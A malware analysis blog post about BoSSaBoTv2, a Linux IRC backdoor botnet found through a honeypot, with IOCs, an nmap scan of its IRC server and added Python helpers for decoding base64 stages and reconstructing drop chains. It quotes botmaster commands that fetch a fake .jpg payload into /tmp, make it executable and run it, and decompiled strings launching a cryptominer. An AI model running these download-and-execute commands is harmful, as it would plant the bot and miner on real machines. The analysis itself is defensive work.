malekal's site (computer help site)
[en] BoSSaBoTv2: another Linux IRC Backdoor
Categories: Malware / Computing / Internet
Today, I was looking at my web honeypot and this one caught my attention:
http://www.malekal.com/modsec/index.php?ip=178.32.59.202
The PHP vulnerability is widely exploited (I already wrote about it: http://www.malekal.com/2014/03/31/backdoor-perl-shellbot-b-et-backdoor-linux-tsunami-a/ ), but it was the first time I saw this base64_decode code.
The code leads to haxmeup.uni.me (192.95.12.34, OVH), which redirects to http://www.bilder-upload.eu/thumb/41130a-1408995611.jpg
I expected to get a PHP shellbot as usual, but this time it was a FUD (fully undetected) binary:
https://www.virustotal.com/fr/file/bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9/analysis/1409041374/
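The two tricks in this first stage are a base64-wrapped PHP payload and an executable served with a .jpg extension. The following is an added example, not code from the post: it decodes base64_decode("...") stages found in a honeypot log line, extracts the URLs they fetch, and checks whether a downloaded "image" is really an ELF binary or a script by its magic bytes. The log line, payload and file bytes are constructed for illustration; the URLs come from the post, everything else (request path, /tmp names) is an assumption.

```python
import base64
import binascii
import re

# Constructed sample stage of the kind the honeypot saw: a system() call that
# fetches a file to /tmp, makes it executable and runs it. Not the captured request.
_STAGE = (
    b'system("wget http://haxmeup.uni.me/ -O /tmp/x.jpg; '
    b'chmod 777 /tmp/x.jpg; /tmp/x.jpg");'
)
# Constructed honeypot log line wrapping that stage in eval(base64_decode('...')).
SAMPLE_LOG = (
    '178.32.59.202 - - [26/Aug/2014:10:47:00 +0200] '
    '"POST /?-d+allow_url_include=On HTTP/1.1" 200 '
    'body="<?php eval(base64_decode(\'' + base64.b64encode(_STAGE).decode() + '\')); ?>"'
)

B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"<>;]+")


def extract_base64_stages(text):
    """Return the decoded argument of every base64_decode("...") call in text."""
    stages = []
    for m in B64_CALL.finditer(text):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64, skip rather than crash on attacker input
        stages.append(raw.decode("utf-8", "replace"))
    return stages


def extract_urls(text):
    """All http(s) URLs in a decoded stage, in order of appearance."""
    return URL_RE.findall(text)


# File signatures checked against the first bytes of a download.
MAGIC = {
    b"\x7fELF": "elf",
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"#!": "script",
}


def classify_magic(data):
    """Identify a file by its magic bytes, independent of the name it was served under."""
    for sig, kind in MAGIC.items():
        if data.startswith(sig):
            return kind
    return "unknown"


IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")


def is_disguised_executable(url, data):
    """True when the URL claims an image but the bytes are an ELF binary or a script."""
    path = url.split("?", 1)[0].lower()
    return path.endswith(IMAGE_EXT) and classify_magic(data) in ("elf", "script")


# Constructed bytes: an ELF header prefix pretending to be a .jpg (not the real sample).
FAKE_JPG = b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8

if __name__ == "__main__":
    for stage in extract_base64_stages(SAMPLE_LOG):
        print("stage:", stage)
        print("urls :", extract_urls(stage))
    print("disguised:", is_disguised_executable(
        "http://www.bilder-upload.eu/thumb/41130a-1408995611.jpg", FAKE_JPG))
```

Checking magic bytes rather than the extension is the point: a hosting site that only looks at the file name will happily serve an ELF as a thumbnail, which is exactly what lets the dropper stay on a legitimate-looking host.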
So I ran it:
It made a connection to 37.59.74.161 (OVH again) on port 8067; there is an ircd behind it:
nmap -sV 37.59.74.161 -p 8067

Starting Nmap 6.00 ( http://nmap.org ) at 2014-08-26 10:47 CEST
Nmap scan report for 37.59.74.161
Host is up (0.027s latency).
PORT     STATE SERVICE VERSION
8067/tcp open  irc     Unreal ircd
Service Info: Host: irc.wix.wix

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
So, an IRC backdoor.
Another surprise: the ircd doesn't use any mode to hide users and the like. About 40 bots, not that many.
So let's play.
On the screenshot, we can see that the botmaster launches an IP range scan, then some bots exploit some servers.
We can see that the exploit against 200.185.236.85 was successful, because it joins the channel as a new bot.
Confirmed by my VM.
We got another DNS name, con32.cz.cc, which resolves to the same IP, 192.95.12.34.
Two new bots:
The ircd is new: around 40 bots in 9 days.
The botmaster regularly makes the bots download a new binary, all from www.bilder-upload.eu (which seems to be a legitimate image host):
!BOSS* SH wget http://www.bilder-upload.eu/thumb/05fbc4-1409059856.jpg -P /tmp
!BOSS* SH mv /tmp/05fbc4-1409059856.jpg /tmp/4L2nJG5Vab
!BOSS* SH chmod 777 /tmp/4L2nJG5Vab
!BOSS* SH /tmp/4L2nJG5Vab
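The four commands above are one drop chain: fetch a file that looks like an image, rename it, make it executable, run it. As an added example (not the post's code), here is a small parser that pulls the `!BOSS* SH <cmd>` orders out of a PRIVMSG capture and follows the file through wget, mv and chmod to report what was executed and where it came from. The IRC lines are constructed around the commands quoted in the post; the botmaster nick, the channel name and the second bot are assumptions (the server name irc.wix.wix is the one nmap reported). Treating `!BOSS*` as a nick wildcard addressing the bots is also an assumption.

```python
import re

# Constructed IRC capture modelled on the commands quoted in the post.
# Nick "boss", channel "#bots" and the "bot123" line are assumptions.
SAMPLE_IRC = """\
:boss!boss@irc.wix.wix PRIVMSG #bots :!BOSS* SH wget http://www.bilder-upload.eu/thumb/05fbc4-1409059856.jpg -P /tmp
:boss!boss@irc.wix.wix PRIVMSG #bots :!BOSS* SH mv /tmp/05fbc4-1409059856.jpg /tmp/4L2nJG5Vab
:boss!boss@irc.wix.wix PRIVMSG #bots :!BOSS* SH chmod 777 /tmp/4L2nJG5Vab
:boss!boss@irc.wix.wix PRIVMSG #bots :!BOSS* SH /tmp/4L2nJG5Vab
:bot123!x@1.2.3.4 PRIVMSG #bots :hello
"""

# ":nick!user@host PRIVMSG target :text" as it appears on the wire.
PRIVMSG = re.compile(r"^:(?P<nick>[^!\s]+)!\S+ PRIVMSG (?P<target>\S+) :(?P<text>.*)$")
# "!<bot pattern> SH <shell command>" (the pattern being a wildcard is an assumption).
BOSS_CMD = re.compile(r"^!(?P<pattern>\S+) SH (?P<cmd>.+)$")


def parse_commands(capture):
    """Return (sender nick, bot pattern, shell command) for each SH order in the capture."""
    out = []
    for line in capture.splitlines():
        m = PRIVMSG.match(line.rstrip("\r"))
        if not m:
            continue
        c = BOSS_CMD.match(m.group("text"))
        if c:
            out.append((m.group("nick"), c.group("pattern"), c.group("cmd")))
    return out


def _wget_destination(argv):
    """Local path wget will write to, honouring -O (explicit name) or -P (directory)."""
    url = next(a for a in argv[1:] if a.startswith("http"))
    if "-O" in argv:
        return argv[argv.index("-O") + 1], url
    dest_dir = argv[argv.index("-P") + 1] if "-P" in argv else "."
    return dest_dir.rstrip("/") + "/" + url.rsplit("/", 1)[-1], url


def reconstruct_drop_chain(commands):
    """Follow wget -> mv -> chmod -> exec; return [(executed path, source URL), ...]."""
    origin = {}      # local path -> URL it was downloaded from
    executed = []
    for _, _, cmd in commands:
        argv = cmd.split()
        if argv[0] == "wget":
            path, url = _wget_destination(argv)
            origin[path] = url
        elif argv[0] == "mv" and len(argv) == 3 and argv[1] in origin:
            origin[argv[2]] = origin.pop(argv[1])   # the file keeps its provenance
        elif argv[0] == "chmod":
            continue                                # permissions only, path unchanged
        elif argv[0] in origin:
            executed.append((argv[0], origin[argv[0]]))
    return executed


if __name__ == "__main__":
    cmds = parse_commands(SAMPLE_IRC)
    for nick, pattern, cmd in cmds:
        print(f"{nick} -> {pattern}: {cmd}")
    print(reconstruct_drop_chain(cmds))
```

Running the reconstruction over a capture gives the pairs worth putting in an abuse report or a blocklist directly: the URL the payload came from and the path it ran under, even when the botmaster renames the file between download and execution.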
Some hashes and hosts recap:

haxmeup.uni.me / con32.cz.cc / con64.cz.cc (192.95.12.34, OVH)
haxmedown.cz.cc
37.59.74.161

http://malwaredb.malekal.com/index.php?hash=35c950db3dc60b55e623ec591f8d7f33
http://malwaredb.malekal.com/index.php?hash=7f8cc390f7b3e53f2921f0debae09902
http://malwaredb.malekal.com/index.php?hash=dfb0291c04d6593103e6ac7a8954f19e
Then I wrote a little script to send the abuse emails; hopefully they will lose some bots.
MalwareMustDie decompiled the binary; some strings: http://pjjoint.malekal.com/files.php?read=20140826_n7h14d5w5i6
Thanks to them. Bitcoin mining capabilities:
000000007BC0 /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null &
000000007C20 pkill minerd ; pkill m32 ; pkill m64
000000007C60 wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.
The most interesting:
000000007E1D BoSSaBoTv2-%s
A Google search finds this topic on http://www.hackforums.net/showthread.php?tid=4395309
According to the post date, the kit is new, and the price is $100.
Update: lots of attacks this weekend:
http://www.malekal.com/modsec/index.php?ip=213.73.31.13
http://www.malekal.com/modsec/index.php?ip=195.154.140.251
http://www.malekal.com/modsec/index.php?ip=5.135.64.105
http://www.malekal.com/modsec/index.php?ip=46.105.230.91
http://www.malekal.com/modsec/index.php?ip=128.233.173.167
Binaries are undetected:
http://malwaredb.malekal.com/index.php?hash=5453043042be4ad21259bcb9b17e9bd3
http://malwaredb.malekal.com/index.php?hash=36263d91d726dcdb93b97ea05ae8656a
IRCd: 23.95.10.101, port 53
2 Comments
sneezing_panda
Posted on 8 September 2014 at 4:28
He's an idiot. http://puu.sh/bqOYA/ebec4b2878.png People are already complaining on the HF thread.
CyD
Posted on 8 September 2014 at 10:52
Using botnets of zombie computers to spread malicious code through vulnerabilities in order to perform cyber-based attacks like denial-of-service is a big mistake. Please, report this kind of cybercrime activities to federal law enforcement. Keep up the good work.